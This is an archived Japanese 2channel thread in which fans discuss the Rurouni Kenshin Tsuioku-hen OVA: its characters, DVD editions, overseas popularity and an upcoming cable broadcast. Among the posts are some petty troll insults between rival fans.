172 :神谷ドブサオル:2007/11/17(土) 21:58:12 ID:???0
さっさとネットカフェに帰れよ基地外代々木^^

173 :名無しさん@お腹いっぱい。:2007/11/17(土) 23:18:50 ID:???0
巴=ネコ
薫=タヌキ(笑)

174 :名無しさん@お腹いっぱい。:2007/11/18(日) 00:12:43 ID:???0
巴はウサギだろ

175 :名無しさん@お腹いっぱい。:2007/11/18(日) 01:04:53 ID:???0
緋村夫婦はツンデレネコ夫婦

176 :名無しさん@お腹いっぱい。:2007/11/18(日) 18:45:01 ID:???0
海外でこんなに人気あるなら追憶編第二部製作してほしい

177 :名無しさん@お腹いっぱい。:2007/11/18(日) 20:19:41 ID:???0
鳥羽伏見戦メインで作ってほしいな

178 :名無しさん@お腹いっぱい。:2007/11/18(日) 21:43:40 ID:???0
夫婦としてのマターリ新婚生活を・・

179 :名無しさん@お腹いっぱい。:2007/11/19(月) 01:05:52 ID:???0
四幕の巴は殺人的な美しさだな

180 :名無しさん@お腹いっぱい。:2007/11/19(月) 08:53:05 ID:???O
一幕の剣心の美しさも異常

181 :名無しさん@お腹いっぱい。:2007/11/19(月) 20:12:19 ID:???0
これぞ美男美女夫婦

182 :名無しさん@お腹いっぱい。:2007/11/19(月) 21:43:49 ID:???0
英語版の巴の声めちゃくちゃ萌えた(*´Д`)ハァハァ・・

183 :名無しさん@お腹いっぱい。:2007/11/20(火) 02:03:07 ID:???O
追憶編って全35ヶ国で翻訳されてるんだな
すげぇ…

184 :名無しさん@お腹いっぱい。:2007/11/20(火) 19:08:26 ID:???0
>>183
中国語の巴聞きたいw

185 ::2007/11/20(火) 20:14:28 ID:???0
ニーハオ

186 :名無しさん@お腹いっぱい。:2007/11/20(火) 22:08:46 ID:???O
>>183
そんなに有るのなら日本のテレビ局で放送して欲しい

187 :名無しさん@お腹いっぱい。:2007/11/20(火) 22:56:58 ID:???0
フタエノキワミ、アッー!

188 :名無しさん@お腹いっぱい。:2007/11/20(火) 23:38:38 ID:M/bM/Q4q0
>>186
PTAが黙っちゃいないから無理

189 :名無しさん@お腹いっぱい。:2007/11/21(水) 01:13:23 ID:???0
PTAのおばはんなんてボコボコにしてやんよ

190 :名無しさん@お腹いっぱい。:2007/11/21(水) 09:34:55 ID:???O
英語吹き替え版も日本語に負けず劣らずクオリティ高いな

191 :名無しさん@お腹いっぱい。:2007/11/21(水) 20:05:05 ID:???0
巌さんの消え入りそうに儚い声色が好き

192 :名無しさん@お腹いっぱい。:2007/11/21(水) 22:00:02 ID:???0
色っぽいよな

193 :名無しさん@お腹いっぱい。:2007/11/22(木) 01:09:43 ID:HFbgAhj70
地上波放送まだー?チンチン

194 :名無しさん@お腹いっぱい。:2007/11/22(木) 15:08:54 ID:???O
スカパーでもいいからまた放送してほすぃ…

195 :緋村アートもえ:2007/11/22(木) 17:59:44 ID:???0
代々木はいまだにおもいだせないのね・・・自分ガ代々木だということに・・・
それともわかってて否定?^^横浜人てやあね

196 :ニーと萌え信者代表:2007/11/22(木) 18:04:39 ID:???0
ひどい・・社会カラ嫌われ照る猫と巴ちゃんをいっしょにするなんて・・・
猫おた愛護って痛いわ・・・苦手板の猫の嫌われっぷり・・・

197 :ニーと萌え信者代表:2007/11/22(木) 18:07:24 ID:???0
ウチの腹ガはげてる猫ガ行方不明になってしまった・・・5キロ異常のでぶねこです。おす。黒猫去勢済み。みかけたかたはよろしく。目つきがわるいです。

198 :ニーと萌え信者代表:2007/11/22(木) 18:19:41 ID:???0
巴信者に完璧に負けた代々木はいまごろままにすがりついてるな

199 :神谷ドブサオル:2007/11/22(木) 18:45:44 ID:???0
ネットカフェでまた連投かよ貧乏ホームレス代々木おばさん^^

200 :ニーと萌え信者代表:2007/11/22(木) 18:47:25 ID:???0
あんちがきた!!攻撃開始!!!

201 :ニーと萌え信者代表:2007/11/22(木) 18:48:33 ID:???0
ていうか田舎ニネットカフェなんてものはありません・・・横浜にはあるんだろうけど・・・

202 :神谷ドブサオル:2007/11/22(木) 18:48:41 ID:???0
何日風呂はいってないのこいつ。。悪臭撒き散らしまくり。。まるで薫ゴリラね。。

203 :神谷ドブサオル:2007/11/22(木) 18:49:33 ID:???0
薫オタ=不潔というイメージを植えつけるのも大概にしなさいよ代々木^^

204 :ニーと萌え信者代表:2007/11/22(木) 18:49:38 ID:???0
巴あんち!!くるな!!

205 :ニーと萌え信者代表:2007/11/22(木) 18:51:31 ID:???0
巴あんちめ・・・糞ガ人気ないからここにくるきだな・・・

206 :神谷ドブサオル:2007/11/22(木) 19:05:35 ID:???0
薫おたがご迷惑おかけしてすみません。。同じ薫おたとして恥ずかしい。。。

207 :神谷ドブサオル:2007/11/22(木) 19:10:54 ID:???0
ゴリラ薫はウサギ巴を敵視しやすいんです。。

208 :神谷ドブサオル:2007/11/22(木) 19:23:49 ID:???0
薫がゴリラだという現実を覆い隠したいみたい。。ゴリラかわいいのに

209 :名無しさん@お腹いっぱい。:2007/11/22(木) 21:46:08 ID:???0
巴=ウサギ

ぴったりな形容ですな

210 :名無しさん@お腹いっぱい。:2007/11/22(木) 21:51:34 ID:???0
剣心と巴を争いのない時代へ飛ばしてあげたい

211 :名無しさん@お腹いっぱい。:2007/11/22(木) 23:33:01 ID:???0
>>124
不動の1位って驚異的な高評価だな。

212 :名無しさん@お腹いっぱい。:2007/11/22(木) 23:42:40 ID:???0
日本人として恥じない作品だから嬉しい

213 :名無しさん@お腹いっぱい。:2007/11/23(金) 05:24:43 ID:SwqbSJHV0
日本女性の付加価値が上がりそうで何より

214 :名無しさん@お腹いっぱい。:2007/11/23(金) 07:01:11 ID:???O
外人ってやっぱり侍が好きなんだな〜。

215 :名無しさん@お腹いっぱい。:2007/11/23(金) 13:43:24 ID:???0
侍とバットエンド好き
追憶編なんて日本人以上に外人の感性にあってる作品かもしれん

216 :名無しさん@お腹いっぱい。:2007/11/23(金) 16:49:18 ID:???0
追憶編はある意味ハッピーエンドのような気もするがな

217 :名無しさん@お腹いっぱい。:2007/11/23(金) 20:08:20 ID:???O
>>216
同意
巴の幻影が剣心を包み込むシーン見て思った

218 :名無しさん@お腹いっぱい。:2007/11/23(金) 22:57:39 ID:???O
もう少し江戸時期の巴と清里を描写しても良かったと思う。

219 :名無しさん@お腹いっぱい。:2007/11/24(土) 02:01:18 ID:???0
清里は原作でもovaでも・・・・な扱いっぷりだな

220 :名無しさん@お腹いっぱい。:2007/11/24(土) 13:04:32 ID:???O
清里の声って妻夫木の声に似てる

221 :名無しさん@お腹いっぱい。:2007/11/24(土) 13:40:40 ID:???0
濡れ場シーンをよく見ると背後に清里の怨霊が・・

222 :ヌコ夫婦:2007/11/24(土) 14:14:20 ID:???0
.        ,.、
        レ'⌒⌒ヽ.         , '⌒⌒ヽ,
        |  ノハノハ )       l 从从リ !
        トqリ*´‐`ル ヨシヨシ   |!´‐`*|pノ
        リ!'^ヽVハ         ハ!∧∧jハス
        ノ.:::l:: /::.::l `iフ∧_∧ ノ::(・ω・`).:り
       '、_,,ヽ⌒⌒;;_ノ(´・ω・)i)、_/⌒く,,__ノ
         ハ__,;;::.:./ o(_uuノ   ヽ、::.::__ハ、

223 :名無しさん@お腹いっぱい。:2007/11/24(土) 14:45:57 ID:???0
>>222
(;´Д`)ハァハァ

224 :名無しさん@お腹いっぱい。:2007/11/24(土) 14:59:09 ID:???0
>>222
カワイイ

225 :名無しさん@お腹いっぱい。:2007/11/24(土) 17:08:21 ID:???0
>>222
猫になりたい

226 :名無しさん@お腹いっぱい。:2007/11/24(土) 18:56:22 ID:Y/jQBv4T0
TVアニメとOVA見比べると
同じ原作から分派した作品とは到底思えない・・

227 :名無しさん@お腹いっぱい。:2007/11/24(土) 19:00:21 ID:???0
むしろまったく別のものと考えたほうが見やすい

228 :ニーと萌え信者代表:2007/11/24(土) 19:01:16 ID:???0
緋とおおすぎやで・・・みんなひまなんか

229 :ニーと萌え信者代表:2007/11/24(土) 19:04:10 ID:???0
友人の東京クンにお前の彼女って雪代だろー。と言ったらそんなダサい名前ジャねーよといわれた。お宅と一パン人の温度差をかんじた・・・

230 :ニーと萌え信者代表:2007/11/24(土) 19:13:42 ID:???0
俺の近くの根とカフェは電車で3時間らしい。田舎や

231 :神谷ドブサオル:2007/11/24(土) 19:34:14 ID:???0
俺の彼女神谷なんだぜーって自慢したらヲタクヘア狸と付き合ってのかよって馬鹿にされた

232 :神谷ドブサオル:2007/11/24(土) 19:36:23 ID:???0
ボンバーヘアの彼女に美容院代も与えてやれないのかよ・・て

233 :神谷ドブサオル:2007/11/24(土) 19:38:47 ID:???0
お前の彼女悪臭まみれ風呂くらい入れろとも言われた。。みんな薫を嫌煙する。。。

234 :神谷ブタオル:2007/11/24(土) 19:45:05 ID:???0
悪臭ブタオルを今晩湯で煮たいと思います。。。人様にお披露目できる程度に

235 :名無しさん@お腹いっぱい。:2007/11/24(土) 19:56:43 ID:???0
>>222
迷い猫を抱く夫婦萌え

236 :名無しさん@お腹いっぱい。:2007/11/24(土) 20:55:04 ID:???0
w

237 :名無しさん@お腹いっぱい。:2007/11/25(日) 01:07:05 ID:???O
巴と縁と剣心と縁の4Pが見たいです><

238 :名無しさん@お腹いっぱい。:2007/11/25(日) 02:33:35 ID:???O
>>297
オイボレも入れてください><

239 :名無しさん@お腹いっぱい。:2007/11/25(日) 07:40:49 ID:???0
次からこれをテンプレにしようぜ

         /       ヽ
        /          \
        |            |    >>通常版(全4巻)
        |  |ヽ|ヽ  /|/|/||  |     現在はもう販売されてません。
        |  | ●)ヽ/ ●) |  | 
        |   ゝ  _    |  |    >>再販版=廉価版(全4巻)
        |  ト、______ノ|  |     現在販売されているものです。
        |  |/  ヽ V / ヽ| /     通常版の特典はありませんが英語吹替・字幕があります。
        ヽ、|   ヽ/    |/  
          | | ̄ ̄ ̄ ̄ | |     >>特別版(ディレクターズカット)(全1巻)
          | |____ | |       追加映像がありますが全体的な繋ぎがよくありません。
          ヽ|       |-      
           |       |    
           |_____|    どれもオススメ…みんな買ってね…あなた
           (_)(_)     海賊版は…知りません…


240 :名無しさん@お腹いっぱい。:2007/11/25(日) 08:14:17 ID:???0
>>239
ワロスw
GJ

241 :名無しさん@お腹いっぱい。:2007/11/25(日) 12:59:20 ID:???0
>>239
通常版と特別版の違いも書いてくれるとありがたい

242 :名無しさん@お腹いっぱい。:2007/11/25(日) 13:16:23 ID:???0
追憶編って四話完結っていうのが最初もの凄く物足りなかったけど、今考えると

斬る男−起
迷い猫−承
宵里山−転
十字傷−結

で上手くまとまってるね。

243 :名無しさん@お腹いっぱい。:2007/11/25(日) 13:54:32 ID:???0
十字傷の回は結であり起でもある

244 :名無しさん@お腹いっぱい。:2007/11/25(日) 16:35:45 ID:???O
確かに

245 :名無しさん@お腹いっぱい。:2007/11/25(日) 18:20:28 ID:???0
追憶編に「結」はないよね

246 :名無しさん@お腹いっぱい。:2007/11/25(日) 21:07:24 ID:I//G6VbT0
ダークフェノメノン!

247 :名無しさん@お腹いっぱい。:2007/11/25(日) 22:36:11 ID:???0
早く地上波で放送してください

248 :名無しさん@お腹いっぱい。:2007/11/25(日) 23:16:49 ID:???0
追憶編のサントラはレンタルしてないの?
わざわざ定価で買うのもなんだかなあと思っているんですが・・

249 :名無しさん@お腹いっぱい。:2007/11/26(月) 00:10:40 ID:???0
>>248
買いなさい

250 :名無しさん@お腹いっぱい。:2007/11/26(月) 00:20:09 ID:???O
追憶編OVAに剣心15才、巴18才と出てたかな?

251 :名無しさん@お腹いっぱい。:2007/11/26(月) 00:54:00 ID:???0
>>248
楽天で20パーオフで売ってたよ

252 :名無しさん@お腹いっぱい。:2007/11/26(月) 00:57:28 ID:???0
>>250
出てない。
海外サイトでOVAから入ったファンの子が原作での年齢を知ってびっくらこいた。
巴の剣心に対する「子供・・」という台詞で大体の年齢設定は分かりそうな気もするが。
巴を18歳と推測するのは原作読んでなかったら不可能だよな・・。

253 :名無しさん@お腹いっぱい。:2007/11/26(月) 02:22:02 ID:???O
TV版ED6で巴が出てるがTVで追憶編をやる予定だったんだろうか。

254 :名無しさん@お腹いっぱい。:2007/11/26(月) 08:42:28 ID:???O
うん
でも視聴率悪すぎて追憶編突入する前に打ち切りになった

255 :名無しさん@お腹いっぱい。:2007/11/26(月) 12:40:09 ID:???O
そうなんだ
まあ京都編以降は約一年オリジナル(島原編、黒の騎士編、風水編とか)だったからな。


256 :名無しさん@お腹いっぱい。:2007/11/26(月) 14:41:37 ID:???0
>>242
斬る男−春
迷い猫−夏
宵里山−秋
十字傷−冬
でもある

>>255
オリジナル編の糞さは酷かった
京都編までをいい感じに作っていので期待していただけに
特にそう感じた

257 :名無しさん@お腹いっぱい。:2007/11/26(月) 19:30:17 ID:???0
>斬る男−春
>迷い猫−夏
>宵里山−秋
>十字傷−冬
>でもある


ほんとだ!!何十回と見てるのに今気が付いた・・orz

258 :名無しさん@お腹いっぱい。:2007/11/26(月) 19:40:46 ID:???O
TV版はシシオが終わってからつまらなくなったよな。

259 :名無しさん@お腹いっぱい。:2007/11/26(月) 21:29:11 ID:???0
基地害巴アンチの荒らし通報されてるね。通るといいなあ

260 :名無しさん@お腹いっぱい。:2007/11/26(月) 21:52:38 ID:SMz86CnZ0
ニコニコでの追憶編のコメがかなりひどい件
空気読んでほしい

261 :名無しさん@お腹いっぱい。:2007/11/26(月) 22:08:15 ID:???O
キッズステーションきた!!

262 :名無しさん@お腹いっぱい。:2007/11/26(月) 22:15:21 ID:SMz86CnZ0
いつ?

263 :名無しさん@お腹いっぱい。:2007/11/26(月) 22:19:48 ID:???O
>>258
その以前に原作と掛け離れてる
BGMは嫌いじゃない

264 :名無しさん@お腹いっぱい。:2007/11/26(月) 22:53:06 ID:???O
>>262確か12月9日と16日。
何故4話連続じゃないんだ…

265 :名無しさん@お腹いっぱい。:2007/11/26(月) 23:43:50 ID:???0
>>264
まじか!!!もうすぐじゃねーかwww

266 :名無しさん@お腹いっぱい。:2007/11/26(月) 23:46:07 ID:???0
またみんなで実況したいね
追憶編放送時の実況スレの盛り上がりは異常

267 :名無しさん@お腹いっぱい。:2007/11/27(火) 00:08:15 ID:???0
>>264
二日に分けて二話づつ放送ってこと?

268 :名無しさん@お腹いっぱい。:2007/11/27(火) 00:29:30 ID:???O
>>261
キッズステーションとは何ですか?

269 :名無しさん@お腹いっぱい。:2007/11/27(火) 00:43:12 ID:???O
>>258
全くだな、つか志々雄編がたった30話で終わった事に絶望した!

270 :名無しさん@お腹いっぱい。:2007/11/27(火) 01:03:25 ID:???O
>>268

ケーブルテレビのアニメ専門チャンネル。

271 :名無しさん@お腹いっぱい。:2007/11/27(火) 01:14:46 ID:???O
>>267そういうことです。


272 :名無しさん@お腹いっぱい。:2007/11/27(火) 08:39:11 ID:???O
うを〜楽しみすぎる!!!!
いつもは年明けまじかの放送なのに今回は一足早いのね

273 :名無しさん@お腹いっぱい。:2007/11/27(火) 19:17:56 ID:???O
追憶編から見た人は題名の「るろうに」が不思議に思う。

274 :名無しさん@お腹いっぱい。:2007/11/27(火) 20:50:40 ID:???0
>>273
確かに。
「追憶」だけにしたほうが簡潔な感じもする

275 :名無しさん@お腹いっぱい。:2007/11/27(火) 22:10:52 ID:???O
>>270
有難うございます。
家にケーブルテレビないので地上波でも放送してくれ。

276 :名無しさん@お腹いっぱい。:2007/11/27(火) 23:08:24 ID:???O
>>269
以前に剣心の声で萎える

277 :名無しさん@お腹いっぱい。:2007/11/27(火) 23:31:48 ID:???0
>>275
自分もケーブルない・・orz
実況参加して雰囲気だけでも楽しもうぜ

278 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:41:02 ID:???O
追憶編はTVアニメより知名度低いからな

279 :名無しさん@お腹いっぱい。:2007/11/28(水) 00:47:29 ID:???0
年末にハガレンの映画ゴールデンで放送されるらしい
追憶編やったほうが絶対反響大きいと思うんだが

280 :名無しさん@お腹いっぱい。:2007/11/28(水) 02:36:51 ID:???O
>>279
だな。
R15指定とかにすれば放送出来る。
て言うか、追憶編以上に残虐な映画なんて放送してるけどな。

281 :名無しさん@お腹いっぱい。:2007/11/28(水) 19:24:29 ID:???0
>>280
追憶編の殺戮シーンとかエロシーンって
どことなく美しくて、視聴者も引くというより見入りると思う
自分がそうだったように。
R指定されてること自体が不思議でならない

282 :名無しさん@お腹いっぱい。:2007/11/28(水) 20:04:14 ID:???0
血の雨を牡丹の花びらで比喩してる辺りは芸術の域に達してるよな

283 :名無しさん@お腹いっぱい。:2007/11/29(木) 00:53:56 ID:???0
956 :名乗る程の者ではござらん:2007/11/29(木) 00:35:37 ID:wtcOrFJC
追憶編は外国人が選ぶアニメランキングで一位になってたらしいね。外国人向けアニメサイトで。
「日本の歴史がそうであるように、このアニメも血と暴力に飢えている。」
「おまけだと思って見たら、最高傑作だった」
だとさw十川さんも時代劇の脚本やってんなら、企画してほしいよ。
外国人ランキングで一年近く一位のポジションキープしてるらしいんだから。

別スレで拾ったんだがこれまじ?すごくね??

284 :名無しさん@お腹いっぱい。:2007/11/29(木) 02:49:31 ID:???O
>>283
なにを今更

285 :名無しさん@お腹いっぱい。:2007/11/29(木) 04:09:31 ID:???0
「おまけだと思って見たら、最高傑作だった」

ワロタw
俺と全く同じ感想だ

286 :名無しさん@お腹いっぱい。:2007/11/29(木) 06:33:21 ID:???O
もはや芸術。

287 :名無しさん@お腹いっぱい。:2007/11/29(木) 12:19:25 ID:???O
血と暴力に餓えているってのは褒め言葉?

288 :名無しさん@お腹いっぱい。:2007/11/29(木) 17:56:22 ID:???O
アメ公は追憶編をバイオレンスアニメかなんかと勘違いしてんのか

289 :名無しさん@お腹いっぱい。:2007/11/29(木) 19:55:07 ID:???0
追憶編評価してるヴァイオレンス国家アメリカの一般ピーポーの中で
日本の四季の美しさや巴のような日本女性の気高さをちゃんと理解できてる輩なんて3割もいなさそうだな。

290 :名無しさん@お腹いっぱい。:2007/11/29(木) 22:24:00 ID:???O
この前TBSでやってたけど意外にアメリカって厳しいよな。タバコとか血が消されてたし。

291 :名無しさん@お腹いっぱい。:2007/11/29(木) 22:55:11 ID:???0
>>289
外人からしたら業の深さとかなんのこっちゃって感じだろうなw

292 :名無しさん@お腹いっぱい。:2007/11/29(木) 23:50:26 ID:???0
>>290
その割に男女のギシアンは平気でゴールデンで流してる

293 :名無しさん@お腹いっぱい。:2007/11/30(金) 08:29:37 ID:???0
海外での知名度のが高いって凄いね

294 :名無しさん@お腹いっぱい。:2007/11/30(金) 18:22:07 ID:???O
キッズステーション楽しみすぎる〜

295 :名無しさん@お腹いっぱい。:2007/11/30(金) 21:40:49 ID:???0
いい時期に放送してくれるね
追憶編はやっぱ真冬に見るのが最適

296 :名無しさん@お腹いっぱい。:2007/11/30(金) 21:58:15 ID:???O
たぶん泣いてしまう…。

297 :名無しさん@お腹いっぱい。:2007/12/01(土) 00:41:19 ID:???0
>>296
ティッシュ三箱は常備

298 :名無しさん@お腹いっぱい。:2007/12/01(土) 00:57:46 ID:???0
放送されるのって通常版、特別版どっちだろ?

299 :名無しさん@お腹いっぱい。:2007/12/01(土) 01:16:35 ID:???0
>>298
通常版でなければ放送する意味がない!

300 :名無しさん@お腹いっぱい。:2007/12/01(土) 01:25:22 ID:???O
各国のるろ剣のキャストが酷い件
とくに剣心と斎藤


301 :名無しさん@お腹いっぱい。:2007/12/01(土) 02:17:58 ID:???0
>>298
今までのキッズの放送の場合は必ずといっていいほど特別版放送だったからなあ・・
残念だけど今回も特別版が放送される確率のが高いかも

302 :名無しさん@お腹いっぱい。:2007/12/01(土) 12:50:22 ID:???0
高画質で放送してくれ
DVDに落として売りまくる

303 :名無しさん@お腹いっぱい。:2007/12/01(土) 17:36:14 ID:???0
>>325
死ね!

304 :名無しさん@お腹いっぱい。:2007/12/01(土) 17:39:35 ID:???0
>>325に逮捕状

305 :名無しさん@お腹いっぱい。:2007/12/01(土) 19:48:08 ID:???O
325は何処に?

306 :名無しさん@お腹いっぱい。:2007/12/01(土) 20:51:20 ID:???O
キッズステーション何時から?
残業だったら見れないかもorz

307 :名無しさん@お腹いっぱい。:2007/12/02(日) 00:56:44 ID:???0
椿三十郎見てきたんだが、椿が舞い散るシーンが追憶編とダブった

308 :名無しさん@お腹いっぱい。:2007/12/02(日) 03:12:17 ID:???0
>>307
玉緒の鞘という台詞もどことなく被るな

309 :名無しさん@お腹いっぱい。:2007/12/02(日) 03:48:33 ID:???0
トヨエツのキャラが斎藤っぽいと思ったw>椿三十郎

310 :名無しさん@お腹いっぱい。:2007/12/02(日) 15:26:22 ID:???0
>>309
剣心が織田雄二とかありえねー・・

311 :名無しさん@お腹いっぱい。:2007/12/02(日) 17:32:36 ID:???0
椿三十郎大ヒットの煽りを受けて追憶編も地上派初登場!!











という夢を見た

312 :名無しさん@お腹いっぱい。:2007/12/02(日) 19:10:25 ID:???0
>>311
どうせなら映画化してしまえ

313 :名無しさん@お腹いっぱい。:2007/12/02(日) 19:13:07 ID:???0
あと4日かwktk!!!

314 :名無しさん@お腹いっぱい。:2007/12/02(日) 19:28:08 ID:???0
高画質で録画します。

315 :名無しさん@お腹いっぱい。:2007/12/02(日) 19:50:12 ID:???0
巴の笑顔のシーン誰かキャプって
壁紙にしたい

316 :名無しさん@お腹いっぱい。:2007/12/02(日) 20:39:52 ID:???0
>>315
6日に放送するから自分でやりなさい。

317 :名無しさん@お腹いっぱい。:2007/12/02(日) 20:40:20 ID:???0
6日じゃなくて9日でした

318 :名無しさん@お腹いっぱい。:2007/12/02(日) 23:30:37 ID:???0
具体的な放送時間が知りたいのですが・・

319 :名無しさん@お腹いっぱい。:2007/12/03(月) 03:19:43 ID:???0
特別版不評だな
三幕の巴の一報を飯塚から聞かされて唇がガタガタ震えてる剣心のドアップのシーンが大好きなんだが
通常版では見られない繋ぎの良さがある

320 :名無しさん@お腹いっぱい。:2007/12/03(月) 14:58:45 ID:???O
特別版のが特典は豪華だよな

321 :名無しさん@お腹いっぱい。:2007/12/03(月) 19:44:38 ID:???0
>>320
俺も通常版既に持ってたけど
南蛮渡来語を話す緋村夫婦が見たさに特別版も勝ってしまったよ。

322 :名無しさん@お腹いっぱい。:2007/12/03(月) 22:32:22 ID:???0
特別版と通常版ってそんなに違うの?
詳しく教えてくれ

323 :名無しさん@お腹いっぱい。:2007/12/03(月) 23:22:23 ID:???0
>>322
         /       ヽ
        /          \
        |            |    >>通常版(全4巻)
        |  |ヽ|ヽ  /|/|/||  |     現在はもう販売されてません。
        |  | ●)ヽ/ ●) |  | 
        |   ゝ  _    |  |    >>再販版=廉価版(全4巻)
        |  ト、______ノ|  |     現在販売されているものです。
        |  |/  ヽ V / ヽ| /     通常版の特典はありませんが英語吹替・字幕があります。
        ヽ、|   ヽ/    |/  
          | | ̄ ̄ ̄ ̄ | |     >>特別版(ディレクターズカット)(全1巻)
          | |____ | |       追加映像がありますが全体的な繋ぎがよくありません。
          ヽ|       |-      
           |       |    
           |_____|    どれもオススメ…みんな買ってね…あなた
           (_)(_)     海賊版は…知りません…

324 :名無しさん@お腹いっぱい。:2007/12/04(火) 00:01:59 ID:???0
>>323
かわいい

325 :名無しさん@お腹いっぱい。:2007/12/04(火) 00:46:51 ID:???0
>>323
次からテンプレに追加しよう
新参者へのいいガイドブックになる

326 :名無しさん@お腹いっぱい。:2007/12/04(火) 01:30:03 ID:???0
剣心バージョンもほしいw

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)